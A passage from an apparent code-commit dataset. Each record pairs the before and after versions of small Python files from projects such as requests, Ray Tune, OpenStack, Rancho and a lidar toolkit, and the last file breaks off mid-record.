except NotImplementedError:
shp = T.shape(argument)
H = T.jacobian(g.flatten(), argument).reshape(
T.concatenate([shp, shp]), 2*A.ndim)
R = T.tensordot(H, A, A.ndim)
try:
hess = theano.function([argument, A], R, on_unused_input='raise')
except theano.compile.UnusedInputError:
print "hello"
warn('Theano detected unused input - suggests hessian may be zero or '
'constant.')
hess = theano.function([argument, A], R, on_unused_input='ignore')
return grad, hess
| bsd-3-clause | Python |
e39fbef683e0541f8cc189aa8a612f8008a98410 | Add function to load converted lidar records | oliverlee/antlia | python/antlia/dtype.py | python/antlia/dtype.py | # -*- coding: utf-8 -*-
import gzip
import pickle
import numpy as np
LIDAR_NUM_ANGLES = 1521
LIDAR_FOV_DEG = 190
LIDAR_SAMPLE_RATE = 20
LIDAR_ANGLES = np.linspace( # in radians
(90 - LIDAR_FOV_DEG/2)*np.pi/180,
(90 + LIDAR_FOV_DEG/2)*np.pi/180,
LIDAR_NUM_ANGLES
)
"""LIDAR datatype format is:
(
timestamp (long),
flag (bool saved as int),
accelerometer[3] (double),
gps[3] (double),
distance[LIDAR_NUM_ANGLES] (long),
)
'int' and 'long' are the same size on the raspberry pi (32 bits).
"""
LIDAR_RECORD_DTYPE = np.dtype(','.join(
['i4'] + ['i4'] + 3*['f8'] + 3*['f8'] + LIDAR_NUM_ANGLES*['i4']
)
)
LIDAR_CONVERTED_DTYPE = np.dtype([
('time', 'f8'),
('sync', 'f8'),
('accelerometer x', 'f8'), # body x-axis may not be aligned with inertial!
('accelerometer y', 'f8'), # body y-axis may not be aligned with inertial!
('accelerometer z', 'f8'), # body z-axis may not be aligned with inertial!
('gps', 'f8', (3,)),
('distance', 'f8', (LIDAR_NUM_ANGLES,)),
])
def load_converted_record(filename):
with gzip.open(filename, 'rb') as f:
return pickle.load(f).view(np.recarray)
| # -*- coding: utf-8 -*-
import numpy as np
LIDAR_NUM_ANGLES = 1521
LIDAR_FOV_DEG = 190
LIDAR_SAMPLE_RATE = 20
LIDAR_ANGLES = np.linspace( # in radians
(90 - LIDAR_FOV_DEG/2)*np.pi/180,
(90 + LIDAR_FOV_DEG/2)*np.pi/180,
LIDAR_NUM_ANGLES
)
"""LIDAR datatype format is:
(
timestamp (long),
flag (bool saved as int),
accelerometer[3] (double),
gps[3] (double),
distance[LIDAR_NUM_ANGLES] (long),
)
'int' and 'long' are the same size on the raspberry pi (32 bits).
"""
LIDAR_RECORD_DTYPE = np.dtype(','.join(
['i4'] + ['i4'] + 3*['f8'] + 3*['f8'] + LIDAR_NUM_ANGLES*['i4']
)
)
LIDAR_CONVERTED_DTYPE = np.dtype([
('time', 'f8'),
('sync', 'f8'),
('accelerometer x', 'f8'), # body x-axis may not be aligned with inertial!
('accelerometer y', 'f8'), # body y-axis may not be aligned with inertial!
('accelerometer z', 'f8'), # body z-axis may not be aligned with inertial!
('gps', 'f8', (3,)),
('distance', 'f8', (LIDAR_NUM_ANGLES,)),
])
| bsd-2-clause | Python |
5f501af61b416dae0e46236a8e1f9684dcc66e21 | Write out concatenated frame on decode test failure | scanner-research/scanner,scanner-research/scanner,scanner-research/scanner,scanner-research/scanner | python/decoder_test.py | python/decoder_test.py | import argparse
import scanner
import numpy as np
import cv2
from decode import db
@db.loader('frame')
def load_frames(buf, metadata):
return np.frombuffer(buf, dtype=np.uint8) \
.reshape((metadata.height,metadata.width,3))
def extract_frames(args):
job = load_frames(args['dataset'], 'edr')
video_paths = job._dataset.video_data.original_video_paths
for (vid, frames) in job.as_frame_list():
video_path = video_paths[int(vid)]
inp = cv2.VideoCapture(video_path)
assert(inp.isOpened())
video_frame_num = -1
for (frame_num, buf) in frames:
while video_frame_num != frame_num:
_, video_frame = inp.read()
video_frame_num += 1
scanner_frame = cv2.cvtColor(buf, cv2.COLOR_RGB2BGR)
frame_diff = np.abs(scanner_frame - video_frame)
if frame_diff.sum() != 0:
print('Frame {} does not match!'.format(frame_num))
cv2.imwrite('decode_frames_' + str(frame_num) + '.jpg',
np.concatenate(
(scanner_frame, video_frame, frame_diff), 1))
if __name__ == "__main__":
p = argparse.ArgumentParser(description='Extract JPEG frames from videos')
p.add_argument('dataset', type=str)
extract_frames(p.parse_args().__dict__)
| import argparse
import scanner
import numpy as np
import cv2
from decode import db
@db.loader('frame')
def load_frames(buf, metadata):
return np.frombuffer(buf, dtype=np.uint8) \
.reshape((metadata.height,metadata.width,3))
def extract_frames(args):
job = load_frames(args['dataset'], 'edr')
video_paths = job._dataset.video_data.original_video_paths
for (vid, frames) in job.as_frame_list():
video_path = video_paths[int(vid)]
inp = cv2.VideoCapture(video_path)
assert(inp.isOpened())
video_frame_num = -1
for (frame_num, buf) in frames:
while video_frame_num != frame_num:
_, video_frame = inp.read()
video_frame_num += 1
scanner_frame = cv2.cvtColor(buf, cv2.COLOR_RGB2BGR)
frame_diff = (scanner_frame - video_frame).sum()
if frame_diff != 0:
print('Frame {} does not match!'.format(frame_num))
if __name__ == "__main__":
p = argparse.ArgumentParser(description='Extract JPEG frames from videos')
p.add_argument('dataset', type=str)
extract_frames(p.parse_args().__dict__)
| apache-2.0 | Python |
21140c20c62fb90806f77f0820a046e364567a6d | fix tune stopper attribute name (#28517) | ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray,ray-project/ray | python/ray/tune/stopper/stopper.py | python/ray/tune/stopper/stopper.py | import abc
from ray.util.annotations import PublicAPI
@PublicAPI
class Stopper(abc.ABC):
"""Base class for implementing a Tune experiment stopper.
Allows users to implement experiment-level stopping via ``stop_all``. By
default, this class does not stop any trials. Subclasses need to
implement ``__call__`` and ``stop_all``.
.. code-block:: python
import time
from ray import air, tune
from ray.tune import Stopper
class TimeStopper(Stopper):
def __init__(self):
self._start = time.time()
self._deadline = 300
def __call__(self, trial_id, result):
return False
def stop_all(self):
return time.time() - self._start > self._deadline
tuner = Tuner(
Trainable,
tune_config=tune.TuneConfig(num_samples=200),
run_config=air.RunConfig(stop=TimeStopper())
)
tuner.fit()
"""
def __call__(self, trial_id, result):
"""Returns true if the trial should be terminated given the result."""
raise NotImplementedError
def stop_all(self):
"""Returns true if the experiment should be terminated."""
raise NotImplementedError
@PublicAPI
class CombinedStopper(Stopper):
"""Combine several stoppers via 'OR'.
Args:
*stoppers: Stoppers to be combined.
Example:
.. code-block:: python
from ray.tune.stopper import CombinedStopper, \
MaximumIterationStopper, TrialPlateauStopper
stopper = CombinedStopper(
MaximumIterationStopper(max_iter=20),
TrialPlateauStopper(metric="my_metric")
)
tuner = Tuner(
Trainable,
run_config=air.RunConfig(stop=stopper)
)
tuner.fit()
"""
def __init__(self, *stoppers: Stopper):
self._stoppers = stoppers
def __call__(self, trial_id, result):
return any(s(trial_id, result) for s in self._stoppers)
def stop_all(self):
return any(s.stop_all() for s in self._stoppers)
| import abc
from ray.util.annotations import PublicAPI
@PublicAPI
class Stopper(abc.ABC):
"""Base class for implementing a Tune experiment stopper.
Allows users to implement experiment-level stopping via ``stop_all``. By
default, this class does not stop any trials. Subclasses need to
implement ``__call__`` and ``stop_all``.
.. code-block:: python
import time
from ray import air, tune
from ray.tune import Stopper
class TimeStopper(Stopper):
def __init__(self):
self._start = time.time()
self._deadline = 300
def __call__(self, trial_id, result):
return False
def stop_all(self):
return time.time() - self._start > self.deadline
tuner = Tuner(
Trainable,
tune_config=tune.TuneConfig(num_samples=200),
run_config=air.RunConfig(stop=TimeStopper())
)
tuner.fit()
"""
def __call__(self, trial_id, result):
"""Returns true if the trial should be terminated given the result."""
raise NotImplementedError
def stop_all(self):
"""Returns true if the experiment should be terminated."""
raise NotImplementedError
@PublicAPI
class CombinedStopper(Stopper):
"""Combine several stoppers via 'OR'.
Args:
*stoppers: Stoppers to be combined.
Example:
.. code-block:: python
from ray.tune.stopper import CombinedStopper, \
MaximumIterationStopper, TrialPlateauStopper
stopper = CombinedStopper(
MaximumIterationStopper(max_iter=20),
TrialPlateauStopper(metric="my_metric")
)
tuner = Tuner(
Trainable,
run_config=air.RunConfig(stop=stopper)
)
tuner.fit()
"""
def __init__(self, *stoppers: Stopper):
self._stoppers = stoppers
def __call__(self, trial_id, result):
return any(s(trial_id, result) for s in self._stoppers)
def stop_all(self):
return any(s.stop_all() for s in self._stoppers)
| apache-2.0 | Python |
eb3aed68e470e44c26bcf4d2973f204be8bff6cd | Delete unnecessary comma. | sony/nnabla,sony/nnabla,sony/nnabla | python/test/function/test_round.py | python/test/function/test_round.py | # Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy as np
import nnabla as nn
import nnabla.functions as F
from nbla_test_utils import list_context
ctxs = list_context('Round')
def ref_round(x):
return np.round(x)
def ref_grad_round(x, dy):
return dy.flatten()
@pytest.mark.parametrize("ctx, func_name", ctxs)
@pytest.mark.parametrize("seed", [313])
def test_fixed_point_quantize_forward_backward(seed,
ctx, func_name):
from nbla_test_utils import cap_ignore_region, \
function_tester
rng = np.random.RandomState(seed)
inputs = [
cap_ignore_region(
rng.randn(2, 3, 4).astype(np.float32) * 2,
(-1e-3, 1e-3))]
function_tester(rng,F.round,
ref_round,
inputs,
atol_b=1e-3, backward=[True],
ctx=ctx, func_name=func_name,
ref_grad=ref_grad_round)
| # Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy as np
import nnabla as nn
import nnabla.functions as F
from nbla_test_utils import list_context
ctxs = list_context('Round')
def ref_round(x, ):
return np.round(x)
def ref_grad_round(x, dy):
return dy.flatten()
@pytest.mark.parametrize("ctx, func_name", ctxs)
@pytest.mark.parametrize("seed", [313])
def test_fixed_point_quantize_forward_backward(seed,
ctx, func_name):
from nbla_test_utils import cap_ignore_region, \
function_tester
rng = np.random.RandomState(seed)
inputs = [
cap_ignore_region(
rng.randn(2, 3, 4).astype(np.float32) * 2,
(-1e-3, 1e-3))]
function_tester(rng,F.round,
ref_round,
inputs,
atol_b=1e-3, backward=[True],
ctx=ctx, func_name=func_name,
ref_grad=ref_grad_round)
| apache-2.0 | Python |
ddecbb79f995cfac469d121d71cbdc6941f6cfef | delete for user api | ironcamel/openstack.api,ntt-pf-lab/backup_openstackx | openstack/extras/users.py | openstack/extras/users.py | from openstack.api import base
class User(base.Resource):
def __repr__(self):
return "<User %s>" % self._info
def delete(self):
self.manager.delete(self)
def update(self, description=None, enabled=None):
description = description or self.description or '(none)'
self.manager.update(self.id, description, enabled)
class UserManager(base.ManagerWithFind):
resource_class = User
def get(self, user_id):
return self._get("/users/%s" % user_id, "user")
def create(self, user_id, email, password, tenant_id, enabled=True):
params = {"user": {"id": user_id,
"email": email,
"tenantId": tenant_id,
"enabled": enabled,
"password": password}}
return self._create('/users', params, "user")
def _create(self, url, body, response_key):
resp, body = self.api.connection.put(url, body=body)
return self.resource_class(self, body[response_key])
def delete(self, user_id):
self._delete("/users/%s" % user_id)
def list(self):
"""
Get a list of users.
:rtype: list of :class:`User`
"""
return self._list("/users", "users")
| from openstack.api import base
class User(base.Resource):
def __repr__(self):
return "<User %s>" % self._info
def delete(self):
self.manager.delete(self)
def update(self, description=None, enabled=None):
description = description or self.description or '(none)'
self.manager.update(self.id, description, enabled)
class UserManager(base.ManagerWithFind):
resource_class = User
def get(self, user_id):
return self._get("/users/%s" % user_id, "user")
def create(self, user_id, email, password, tenant_id, enabled=True):
params = {"user": {"id": user_id,
"email": email,
"tenantId": tenant_id,
"enabled": enabled,
"password": password}}
return self._create('/users', params, "user")
def _create(self, url, body, response_key):
resp, body = self.api.connection.put(url, body=body)
return self.resource_class(self, body[response_key])
def list(self):
"""
Get a list of users.
:rtype: list of :class:`User`
"""
return self._list("/users", "users")
| bsd-3-clause | Python |
c35021091ee308c1be999b2a2a479dd83753cf98 | correct urls include statement | joaquimrocha/Rancho,joaquimrocha/Rancho,joaquimrocha/Rancho | rancho/project/urls.py | rancho/project/urls.py | ########################################################################
# Rancho - Open Source Group/Project Management Tool
# Copyright (C) 2008 The Rancho Team
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
########################################################################
from django.conf.urls.defaults import *
urlpatterns = patterns('rancho.project.views',
(r'^new/$', 'new_project'),
(r'^(?P<p_id>\d+)/$', 'overview'),
(r'^(?P<p_id>\d+)/overview/$', 'overview'),
(r'^(?P<p_id>\d+)/settings/$', 'settings'),
(r'^(?P<p_id>\d+)/delete_logo/$', 'delete_logo'),
(r'^(?P<p_id>\d+)/message/', include('rancho.message.urls')),
(r'^(?P<p_id>\d+)/chat/', include('rancho.chat.urls')),
(r'^(?P<p_id>\d+)/wikiboards/', include('rancho.wikiboard.urls')),
(r'^(?P<p_id>\d+)/todos/', include('rancho.todo.urls')),
(r'^(?P<p_id>\d+)/people/(?P<user_id>\d+)/permissions$', 'edit_permissions'),
(r'^(?P<p_id>\d+)/people/$', 'show_people_project'),
(r'^(?P<p_id>\d+)/people/add/', 'add_people_to_project'),
(r'^(?P<p_id>\d+)/people/remove/', 'remove_user'),
(r'^(?P<p_id>\d+)/milestones/', include('rancho.milestone.urls')),
(r'^(?P<p_id>\d+)/files/', include('rancho.file.urls')),
(r'^(?P<p_id>\d+)/delete/', 'delete_project'),
)
| ########################################################################
# Rancho - Open Source Group/Project Management Tool
# Copyright (C) 2008 The Rancho Team
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
########################################################################
from django.conf.urls.defaults import *
urlpatterns = patterns('rancho.project.views',
(r'^new/$', 'new_project'),
(r'^(?P<p_id>\d+)/$', 'overview'),
(r'^(?P<p_id>\d+)/overview/$', 'overview'),
(r'^(?P<p_id>\d+)/settings/$', 'settings'),
(r'^(?P<p_id>\d+)/delete_logo/$', 'delete_logo'),
(r'^(?P<p_id>\d+)/message/', include('message.urls')),
(r'^(?P<p_id>\d+)/chat/', include('chat.urls')),
(r'^(?P<p_id>\d+)/wikiboards/', include('wikiboard.urls')),
(r'^(?P<p_id>\d+)/todos/', include('todo.urls')),
(r'^(?P<p_id>\d+)/people/(?P<user_id>\d+)/permissions$', 'edit_permissions'),
(r'^(?P<p_id>\d+)/people/$', 'show_people_project'),
(r'^(?P<p_id>\d+)/people/add/', 'add_people_to_project'),
(r'^(?P<p_id>\d+)/people/remove/', 'remove_user'),
(r'^(?P<p_id>\d+)/milestones/', include('milestone.urls')),
(r'^(?P<p_id>\d+)/files/', include('file.urls')),
(r'^(?P<p_id>\d+)/delete/', 'delete_project'),
)
| agpl-3.0 | Python |
46da58250234b1d7351fbb318d318a5a7f5552f2 | Remove binaural models from __init__ file | achabotl/pambox | pambox/speech/__init__.py | pambox/speech/__init__.py | """
The :mod:`pambox.speech` module gather speech intelligibility
models, a framework to run intelligibility experiments, as well as a wrapper
around speech materials.
"""
from __future__ import absolute_import
from .sepsm import Sepsm
from .mrsepsm import MrSepsm
from .sii import Sii
from .stec import Stec
from .material import Material
from .experiment import Experiment
__all__ = [
'Sepsm',
'MrSepsm',
'Sii',
'Stec',
'Material',
'Experiment'
]
| """
The :mod:`pambox.speech` module gather speech intelligibility
models, a framework to run intelligibility experiments, as well as a wrapper
around speech materials.
"""
from __future__ import absolute_import
from .binauralsepsm import BinauralSepsm
from .binauralmrsepsm import BinauralMrSepsm
from .sepsm import Sepsm
from .mrsepsm import MrSepsm
from .sii import Sii
from .stec import Stec
from .material import Material
from .experiment import Experiment
__all__ = [
'BinauralSepsm',
'BinauralMrSepsm',
'Sepsm',
'MrSepsm',
'Sii',
'Stec',
'Material',
'Experiment'
]
| bsd-3-clause | Python |
64ba451049c614eb14d336c2e7989ffaa81b2bb5 | make StreamConsumedError doubly inherit | psf/requests | requests/exceptions.py | requests/exceptions.py | # -*- coding: utf-8 -*-
"""
requests.exceptions
~~~~~~~~~~~~~~~~~~~
This module contains the set of Requests' exceptions.
"""
from .packages.urllib3.exceptions import HTTPError as BaseHTTPError
class RequestException(IOError):
"""There was an ambiguous exception that occurred while handling your
request."""
def __init__(self, *args, **kwargs):
"""
Initialize RequestException with `request` and `response` objects.
"""
response = kwargs.pop('response', None)
self.response = response
self.request = kwargs.pop('request', None)
if (response is not None and not self.request and
hasattr(response, 'request')):
self.request = self.response.request
super(RequestException, self).__init__(*args, **kwargs)
class HTTPError(RequestException):
"""An HTTP error occurred."""
class ConnectionError(RequestException):
"""A Connection error occurred."""
class ProxyError(ConnectionError):
"""A proxy error occurred."""
class SSLError(ConnectionError):
"""An SSL error occurred."""
class Timeout(RequestException):
"""The request timed out.
Catching this error will catch both
:exc:`~requests.exceptions.ConnectTimeout` and
:exc:`~requests.exceptions.ReadTimeout` errors.
"""
class ConnectTimeout(ConnectionError, Timeout):
"""The request timed out while trying to connect to the remote server.
Requests that produced this error are safe to retry.
"""
class ReadTimeout(Timeout):
"""The server did not send any data in the allotted amount of time."""
class URLRequired(RequestException):
"""A valid URL is required to make a request."""
class TooManyRedirects(RequestException):
"""Too many redirects."""
class MissingSchema(RequestException, ValueError):
"""The URL schema (e.g. http or https) is missing."""
class InvalidSchema(RequestException, ValueError):
"""See defaults.py for valid schemas."""
class InvalidURL(RequestException, ValueError):
""" The URL provided was somehow invalid. """
class ChunkedEncodingError(RequestException):
"""The server declared chunked encoding but sent an invalid chunk."""
class ContentDecodingError(RequestException, BaseHTTPError):
"""Failed to decode response content"""
class StreamConsumedError(RequestException, TypeError):
"""The content for this response was already consumed"""
| # -*- coding: utf-8 -*-
"""
requests.exceptions
~~~~~~~~~~~~~~~~~~~
This module contains the set of Requests' exceptions.
"""
from .packages.urllib3.exceptions import HTTPError as BaseHTTPError
class RequestException(IOError):
"""There was an ambiguous exception that occurred while handling your
request."""
def __init__(self, *args, **kwargs):
"""
Initialize RequestException with `request` and `response` objects.
"""
response = kwargs.pop('response', None)
self.response = response
self.request = kwargs.pop('request', None)
if (response is not None and not self.request and
hasattr(response, 'request')):
self.request = self.response.request
super(RequestException, self).__init__(*args, **kwargs)
class HTTPError(RequestException):
"""An HTTP error occurred."""
class ConnectionError(RequestException):
"""A Connection error occurred."""
class ProxyError(ConnectionError):
"""A proxy error occurred."""
class SSLError(ConnectionError):
"""An SSL error occurred."""
class Timeout(RequestException):
"""The request timed out.
Catching this error will catch both
:exc:`~requests.exceptions.ConnectTimeout` and
:exc:`~requests.exceptions.ReadTimeout` errors.
"""
class ConnectTimeout(ConnectionError, Timeout):
"""The request timed out while trying to connect to the remote server.
Requests that produced this error are safe to retry.
"""
class ReadTimeout(Timeout):
"""The server did not send any data in the allotted amount of time."""
class URLRequired(RequestException):
"""A valid URL is required to make a request."""
class TooManyRedirects(RequestException):
"""Too many redirects."""
class MissingSchema(RequestException, ValueError):
"""The URL schema (e.g. http or https) is missing."""
class InvalidSchema(RequestException, ValueError):
"""See defaults.py for valid schemas."""
class InvalidURL(RequestException, ValueError):
""" The URL provided was somehow invalid. """
class ChunkedEncodingError(RequestException):
"""The server declared chunked encoding but sent an invalid chunk."""
class ContentDecodingError(RequestException, BaseHTTPError):
"""Failed to decode response content"""
class StreamConsumedError(RequestException):
"""The content for this response was already consumed"""
| apache-2.0 | Python |
952b21499759ed727e2185261192e6839ed95221 | improve code for getting history from params | shimniok/rockblock,shimniok/rockblock,shimniok/rockblock | status.py | status.py | #!/usr/bin/env python
import math
import cgi
#import cgitb; cgitb.enable() # for troubleshooting
import json
import csv
import config
print "Content-type: application/json"
print
result = [];
form = cgi.FieldStorage()
try:
maximum = int(form.getvalue("history"))
except:
maximum = 1
# TODO: revise to use logfile and extended format
try:
with open(config.db, 'rb') as f:
entries = list(csv.reader(f))
# if specified history is > length of records, use length
maximum = min(maximum, len(entries))
# calculate how many entries to skip
skip = len(entries) - maximum
# print number of entries specified by history param
for e in entries:
if len(e) < 8:
continue
if skip:
skip -= 1
continue
result.append({
'time': e[0],
'momsn': e[1],
'imei': e[2],
'lat': e[7],
'lng': e[8],
'speed': e[9],
'course': e[10],
'text': e[11]
})
finally:
print json.dumps(result, sort_keys=True, indent=4)
| #!/usr/bin/env python
import math
import cgi
#import cgitb; cgitb.enable() # for troubleshooting
import json
import csv
import config
print "Content-type: application/json"
print
result = [];
form = cgi.FieldStorage()
history = form.getvalue("history")
if history == None:
maximum = 1
else:
maximum = int(history)
# TODO: revise to use logfile and extended format
try:
with open(config.db, 'rb') as f:
entries = list(csv.reader(f))
# if specified history is > length of records, use length
maximum = min(maximum, len(entries))
# calculate how many entries to skip
skip = len(entries) - maximum
# print number of entries specified by history param
for e in entries:
if len(e) < 8:
continue
if skip:
skip -= 1
continue
result.append({
'time': e[0],
'momsn': e[1],
'imei': e[2],
'lat': e[7],
'lng': e[8],
'speed': e[9],
'course': e[10],
'text': e[11]
})
finally:
print json.dumps(result, sort_keys=True, indent=4)
| mit | Python |
a09c4bac6e65bb5847f0878822a23235d7f52d51 | Remove all index operations | jrasky/planetlabs-challenge | stocks.py | stocks.py | #!/usr/bin/env python
def find_profit(prices, window):
pivot = None
pivot_price = None
next_pivot = None
next_price = None
profit = 0
for i, price in enumerate(prices):
if pivot is None or price < pivot_price:
pivot = i
pivot_price = price
if pivot + 1 > next_pivot:
next_pivot = pivot + 1
next_price = None
if i == next_pivot:
next_price = price
if pivot != i and (next_pivot is None or price < next_price):
next_pivot = i
next_price = price
if i - pivot == window:
pivot = next_pivot
pivot_price = next_price
next_pivot += 1
next_price = None
profit = max(profit, price - pivot_price)
return profit
def main():
print find_profit([1.0, 2.0, 3.0, 1.0, 3.0, 4.0], 5)
print find_profit([7.0, 5.0, 6.0, 4.0, 5.0, 3.0, 4.0, 2.0, 3.0, 1.0], 5)
print find_profit([4.0, 3.0, 2.0, 4.0, 3.0, 1.0, 1.1, 1.2, 1.3, 1.4], 5)
if __name__ == "__main__":
main()
| #!/usr/bin/env python
def find_profit(prices, window):
pivot = None
next_pivot = None
profit = 0
for i, price in enumerate(prices):
if pivot is None or price < prices[pivot]:
pivot = i
next_pivot = max(next_pivot, pivot + 1)
if pivot != i and (next_pivot is None or price < prices[next_pivot]):
next_pivot = i
if i - pivot == window:
pivot = next_pivot
next_pivot += 1
profit = max(profit, price - prices[pivot])
return profit
def main():
print find_profit([1.0, 2.0, 3.0, 1.0, 3.0, 4.0], 5)
print find_profit([7.0, 5.0, 6.0, 4.0, 5.0, 3.0, 4.0, 2.0, 3.0, 1.0], 5)
print find_profit([4.0, 3.0, 2.0, 4.0, 3.0, 1.0, 1.1, 1.2, 1.3, 3.4], 5)
if __name__ == "__main__":
main()
| mit | Python |
af074f6c1cae0521cdcb135f9413a5b9e1808d44 | fix broken method enqueue | fedusia/python | data_structs/queue.py | data_structs/queue.py | #!/usr/bin/env python3
''' Linear queue '''
class Queue:
def __init__(self, items=[]):
self.items = items
def is_Empty(self):
return self.items == []
def size(self):
return len(self.items)
def enqueue(self, item):
self.items.insert(0, item)
def dequeue(self):
return self.items.pop()
def main():
pass
if __name__ == '__main__':
main()
| #!/usr/bin/env python3
''' Linear queue '''
class Queue:
def __init__(self, items=[]):
self.items = items
def is_Empty(self):
return self.items == []
def size(self):
return len(self.items)
def enqueue(self, item):
self.Queue.insert(0, item)
def dequeue(self):
return self.items.pop()
def main():
pass
if __name__ == '__main__':
main()
| apache-2.0 | Python |
e2cba02550dfbe8628daf024a2a35c0dffb234e9 | Handle different environments, for automation (I4). | rroart/aether,rroart/aether,rroart/aether,rroart/aether,rroart/aether | python/cli/request.py | python/cli/request.py | import requests
import os
aport = os.environ.get('MYAPORT')
if aport is None:
aport = "80"
aport = "23456"
ahost = os.environ.get('MYAHOST')
if ahost is None:
ahost = "localhost"
url1 = 'http://' + ahost + ':' + aport + '/'
#headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
#headers={'Content-type':'application/json', 'Accept':'application/json'}
headers={'Content-Type' : 'application/json;charset=utf-8'}
def request1(param, webpath):
return requests.post(url1 + webpath, json=param, headers=headers)
def request0(data):
return requests.post(url, data='', headers=headers)
#return requests.post(url, data=json.dumps(data), headers=headers)
| import requests
import os
aport = os.environ.get('MYAPORT')
if aport is None:
aport = "80"
aport = "23456"
url1 = 'http://localhost:' + aport + '/'
url2 = 'http://localhost:' + aport + '/action/improvesimulateinvest'
url3 = 'http://localhost:' + aport + '/action/autosimulateinvest'
url4 = 'http://localhost:' + aport + '/action/improveautosimulateinvest'
#headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
#headers={'Content-type':'application/json', 'Accept':'application/json'}
headers={'Content-Type' : 'application/json;charset=utf-8'}
def request1(param, webpath):
return requests.post(url1 + webpath, json=param, headers=headers)
def request2(market, data):
return requests.post(url2 + '/market/' + str(market), json=data, headers=headers)
def request3(market, data):
return requests.post(url3 + '/market/' + str(market), json=data, headers=headers)
def request4(market, data):
return requests.post(url4 + '/market/' + str(market), json=data, headers=headers)
def request0(data):
return requests.post(url, data='', headers=headers)
#return requests.post(url, data=json.dumps(data), headers=headers)
| agpl-3.0 | Python |
de2831df77928523bb58aeb8faa96fbf3d56d4f5 | use renamed package | rdeits/iris,rdeits/iris,rdeits/iris,rdeits/iris | python/irispy/iris.py | python/irispy/iris.py | from __future__ import division
import numpy as np
from irispy.hyperplanes import compute_obstacle_planes
from irispy.mosek_ellipsoid.lownerjohn_ellipsoid import lownerjohn_inner
def inflate_region(obstacle_pts, A_bounds, b_bounds, start, require_containment=False):
A_bounds = np.array(A_bounds)
b_bounds = np.array(b_bounds)
d = np.array(start)
dim = A_bounds.shape[1]
C = 0.01 * np.eye(dim)
best_vol = -1
results = {'p_history': [], 'e_history': []}
iter = 1
while True:
A, b, infeas_start = compute_obstacle_planes(obstacle_pts, C, d)
A = np.vstack((A, A_bounds))
b = np.hstack((b, b_bounds))
if require_containment:
if np.all(A.dot(start) <= b) or iter == 1 or infeas_start:
results['p_history'].append({'A': A, 'b': b})
else:
A = results['p_history'][-1]['A']
b = results['p_history'][-1]['b']
print "Breaking early because start point is no longer contained in polytope"
break
else:
results['p_history'].append({'A': A, 'b': b})
C, d = lownerjohn_inner(A, b)
C = np.array(C)
d = np.array(d)
vol = np.linalg.det(C)
results['e_history'].append({'C': C, 'd': d})
if abs(vol - best_vol) / best_vol < 2e-2:
break
best_vol = vol
iter += 1
return A, b, C, d, results
| from __future__ import division
import numpy as np
from irispy.hyperplanes import compute_obstacle_planes
from irispy.mosek.lownerjohn_ellipsoid import lownerjohn_inner
def inflate_region(obstacle_pts, A_bounds, b_bounds, start, require_containment=False):
A_bounds = np.array(A_bounds)
b_bounds = np.array(b_bounds)
d = np.array(start)
dim = A_bounds.shape[1]
C = 0.01 * np.eye(dim)
best_vol = -1
results = {'p_history': [], 'e_history': []}
iter = 1
while True:
A, b, infeas_start = compute_obstacle_planes(obstacle_pts, C, d)
A = np.vstack((A, A_bounds))
b = np.hstack((b, b_bounds))
if require_containment:
if np.all(A.dot(start) <= b) or iter == 1 or infeas_start:
results['p_history'].append({'A': A, 'b': b})
else:
A = results['p_history'][-1]['A']
b = results['p_history'][-1]['b']
print "Breaking early because start point is no longer contained in polytope"
break
else:
results['p_history'].append({'A': A, 'b': b})
C, d = lownerjohn_inner(A, b)
C = np.array(C)
d = np.array(d)
vol = np.linalg.det(C)
results['e_history'].append({'C': C, 'd': d})
if abs(vol - best_vol) / best_vol < 2e-2:
break
best_vol = vol
iter += 1
return A, b, C, d, results
| bsd-2-clause | Python |
c15b51b93d21673e67975ffcd9a071aacb197975 | Add `app_name` to urls.py for Django v2 | pinax/pinax-invitations,eldarion/kaleo | pinax/invitations/urls.py | pinax/invitations/urls.py | from django.conf.urls import url
from .views import (
AddToAllView,
AddToUserView,
InviteView,
TopOffAllView,
InviteStatView,
TopOffUserView
)
app_name = "pinax_invitations"
urlpatterns = [
url(r"^invite/$", InviteView.as_view(), name="invite"),
url(r"^invite-stat/(?P<pk>\d+)/$", InviteStatView.as_view(), name="invite_stat"),
url(r"^topoff/$", TopOffAllView.as_view(), name="topoff_all"),
url(r"^topoff/(?P<pk>\d+)/$", TopOffUserView.as_view(), name="topoff_user"),
url(r"^addto/$", AddToAllView.as_view(), name="addto_all"),
url(r"^addto/(?P<pk>\d+)/$", AddToUserView.as_view(), name="addto_user"),
]
| from django.conf.urls import url
from .views import (
AddToAllView,
AddToUserView,
InviteView,
TopOffAllView,
InviteStatView,
TopOffUserView
)
urlpatterns = [
